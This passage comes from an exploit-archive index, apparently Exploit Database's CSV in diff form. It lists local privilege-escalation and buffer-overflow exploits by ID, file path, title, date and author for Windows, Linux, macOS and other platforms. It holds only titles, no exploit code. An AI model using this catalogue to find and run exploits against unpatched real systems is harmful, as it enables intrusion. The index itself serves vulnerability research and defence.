-40145,exploits/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,windows,local, -40118,exploits/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local, -40132,exploits/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local, -40141,exploits/bsd/local/40141.c,"NetBSD - 'mail.local(8)' Local Privilege Escalation",2016-07-21,akat1,bsd,local, -40148,exploits/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local, -40151,exploits/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local, -40164,exploits/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local, -42550,exploits/windows/local/42550.py,"My Video Converter 1.5.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local, -40169,exploits/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local, -40172,exploits/windows/local/40172.py,"VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local, -40173,exploits/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local, -40203,exploits/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local, -40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local, -40224,exploits/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local, -40226,exploits/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local, -40268,exploits/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local, -40270,exploits/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",linux,local, -40271,exploits/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation",2016-08-19,"Shadow Brokers",hardware,local, -40322,exploits/windows/local/40322.txt,"ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local, -40323,exploits/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local, -40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local, -40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local, -40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,windows,local, -40443,exploits/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local, -40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local, -40451,exploits/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local, -40460,exploits/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local, -40461,exploits/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local, -40471,exploits/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local, -40473,exploits/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local, -40539,exploits/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local, -40477,exploits/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local, -40478,exploits/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local, -40482,exploits/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local, -40483,exploits/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local, -40484,exploits/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local, -40485,exploits/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local, -40488,exploits/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat Based Distros) - Local Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local, -40489,exploits/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation",2016-10-10,"Qian Zhang",linux,local, -40490,exploits/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local, -40494,exploits/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local, -40497,exploits/windows/local/40497.txt,"Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local, -40564,exploits/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local, -40503,exploits/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local, -40504,exploits/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local, -40523,exploits/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local, -40525,exploits/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local, -40528,exploits/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local, -40533,exploits/windows/local/40533.txt,"NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local, -40535,exploits/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local, -40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local, -40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local, -40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local, -40550,exploits/windows/local/40550.txt,"Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation",2016-10-17,Amir.ght,windows,local, -40562,exploits/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local, -40567,exploits/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local, -40572,exploits/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local, -40573,exploits/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local, -40574,exploits/windows/local/40574.cs,"Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local, -40577,exploits/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local, -40578,exploits/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local, -40579,exploits/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40580,exploits/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40581,exploits/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40582,exploits/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40585,exploits/windows/local/40585.txt,"Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40583,exploits/windows/local/40583.txt,"Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40586,exploits/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40587,exploits/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local, -40588,exploits/multiple/local/40588.txt,"Oracle Netbeans IDE 8.1 - Directory Traversal",2016-10-20,hyp3rlinx,multiple,local, -40606,exploits/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local, -40607,exploits/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local, -40608,exploits/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local, -40611,exploits/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)",2016-10-19,"Phil Oester",linux,local, -40616,exploits/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)",2016-10-21,"Robin Verton",linux,local, -40627,exploits/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local, -40630,exploits/windows/local/40630.py,"Network Scanner 4.0.0 - Local Buffer Overflow (SEH)",2016-10-25,n30m1nd,windows,local, -40634,exploits/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local, -40636,exploits/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local, -40653,exploits/osx/local/40653.txt,"Apple OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local, -40655,exploits/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local, -40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation",2016-10-31,"Google Security Research",windows,local, -40669,exploits/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Local Privilege Escalation",2016-10-31,"Google Security Research",macos,local, -40678,exploits/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local, -40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local, -40688,exploits/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Local Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local, -40679,exploits/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local, -40710,exploits/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local, -40838,exploits/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",linux,local, -40759,exploits/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local, -40741,exploits/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local, -40765,exploits/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local, -40788,exploits/linux/local/40788.txt,"Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation",2016-11-18,"Google Security Research",linux,local, -40789,exploits/linux/local/40789.txt,"Palo Alto Networks PanOS - 'root_reboot' Local Privilege Escalation",2016-11-18,"Google Security Research",linux,local, -40807,exploits/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local, -40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local, -40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local, -40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,linux,local, -40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,linux,local, -40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",linux,local, -40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local, -40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local, -40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local, -40861,exploits/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local, -40863,exploits/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local, -40864,exploits/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local, -40865,exploits/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local, -40871,exploits/lin_x86-64/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,lin_x86-64,local, -40873,exploits/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local, -40902,exploits/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local, -40903,exploits/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - Local Buffer Overflow (SEH)",2016-12-10,malwrforensics,windows,local, -40921,exploits/linux/local/40921.sh,"Nagios < 4.2.4 - Local Privilege Escalation",2016-12-15,"Dawid Golunski",linux,local, -40931,exploits/multiple/local/40931.txt,"iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",multiple,local, -40937,exploits/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",linux,local, -40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM' / 'RSSMON' Command Injection (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local, -40943,exploits/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local, -40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local, -40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local, -40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local, -40957,exploits/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local, -40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local, -40967,exploits/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local, -40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local, -41015,exploits/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local, -41020,exploits/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local, -41021,exploits/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local, -41022,exploits/linux/local/41022.txt,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local, -41076,exploits/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local, -41090,exploits/windows/local/41090.py,"SentryHD 02.01.12e - Local Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local, -41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local, -41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",windows,local, -41149,exploits/osx/local/41149.txt,"Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution",2017-01-23,"Filippo Cavallarin",osx,local, -41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local, -41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local, -41158,exploits/linux/local/41158.txt,"Man-db 2.6.7.1 - Local Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local, -41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local, -41173,exploits/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation",2017-01-26,"Federico Bento",linux,local, -41176,exploits/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local, -41196,exploits/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local, -41207,exploits/windows/local/41207.txt,"Viscosity 1.6.7 - Local Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local, -41217,exploits/android/local/41217.txt,"Google Android - RKP EL1 Code Loading Bypass",2017-02-01,"Google Security Research",android,local, -41221,exploits/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local, -41240,exploits/linux/local/41240.sh,"ntfs-3g (Debian 9) - Local Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local, -41265,exploits/windows/local/41265.py,"IVPN Client 2.6.1 - Local Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local, -41320,exploits/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Local Privilege Escalation",2017-02-12,LiquidWorm,windows,local, -41321,exploits/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local, -41349,exploits/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Local Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local, -41356,exploits/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local, -41435,exploits/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local, -41458,exploits/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local, -41476,exploits/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Local Privilege Escalation",2017-02-28,Pcchillin,windows,local, -41538,exploits/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Local Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local, -41542,exploits/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local, -41597,exploits/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local, -41605,exploits/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,win_x86-64,local, -41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local, -41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local, -41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local, -41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,multiple,local, -41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,windows,local, -41701,exploits/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,windows,local, -41702,exploits/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,windows,local, -41704,exploits/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution (Metasploit)",2011-02-27,Metasploit,windows,local, -41706,exploits/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,windows,local, -41707,exploits/windows/local/41707.rb,"CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)",2011-07-25,Metasploit,windows,local, -41708,exploits/windows/local/41708.rb,"Lenovo System Update - Local Privilege Escalation (Metasploit)",2015-04-12,Metasploit,windows,local, -41709,exploits/windows/local/41709.rb,"Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)",2013-01-31,Metasploit,windows,local, -41710,exploits/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local, -41711,exploits/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local, -41712,exploits/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local, -42555,exploits/ios/local/42555.txt,"Apple iOS < 10.3.1 - Kernel",2017-08-26,"Zimperium zLabs Team",ios,local, -41887,exploits/windows/local/41887.txt,"VirusChaser 8.0 - Local Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local, -42305,exploits/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation",2017-07-10,"Paul Taylor",linux,local, -41886,exploits/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local, -41721,exploits/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation",2017-03-25,sickness,win_x86-64,local, -41722,exploits/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation",2017-03-25,sickness,win_x86-64,local, -41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local, -41754,exploits/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Local Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local, -41760,exploits/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,linux,local, -41761,exploits/linux/local/41761.txt,"AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation",2016-02-19,halfdog,linux,local, -41762,exploits/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation",2016-11-22,halfdog,linux,local, -41763,exploits/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local, -41764,exploits/linux/local/41764.txt,"NTP - Local Privilege Escalation",2016-01-21,halfdog,linux,local, -41765,exploits/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local, -41766,exploits/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation",2012-10-19,halfdog,linux,local, -41770,exploits/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation",2011-01-17,halfdog,linux,local, -41771,exploits/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Local Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local, -41772,exploits/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Local Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local, -41773,exploits/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Local Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local, -42087,exploits/windows/local/42087.py,"TiEmu 2.08 - Local Buffer Overflow",2017-05-30,"Juan Sacco",windows,local, -41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,macos,local, -41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",macos,local, -41870,exploits/multiple/local/41870.txt,"Xen - Broken 